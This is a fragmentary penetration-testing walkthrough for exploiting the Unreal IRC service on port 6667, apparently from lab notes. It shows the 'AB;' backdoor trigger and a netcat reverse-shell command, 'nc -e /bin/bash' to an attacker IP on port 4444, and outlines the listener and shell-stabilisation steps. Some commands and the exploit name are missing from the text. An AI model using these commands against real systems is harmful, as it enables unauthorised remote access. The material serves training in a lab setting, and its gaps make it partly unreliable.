Unreal IRC 6667
Last updated
Last updated
First, check for known exploits in Exploit-DB. A relevant exploit for Unreal IRC is listed as . This exploit can be used to create a reverse shell by abusing the service running on port 6667.
AB;
sends a payload that the server executes (it could be part of the Unreal IRC vulnerability).
nc -e /bin/bash 11.11.11.11 4444
tells the target system to execute nc
and open a reverse shell (/bin/bash
) to your Kali machine on port 4444.
This creates a more stable pseudo-terminal, allowing for better interaction with the shell.
On Kali Machine (attacker):
Start listener on port 4444:
On Target (10.10.10.10):
Connect to Unreal IRC service:
Fire off reverse shell command:
Once connected, stabilize the shell: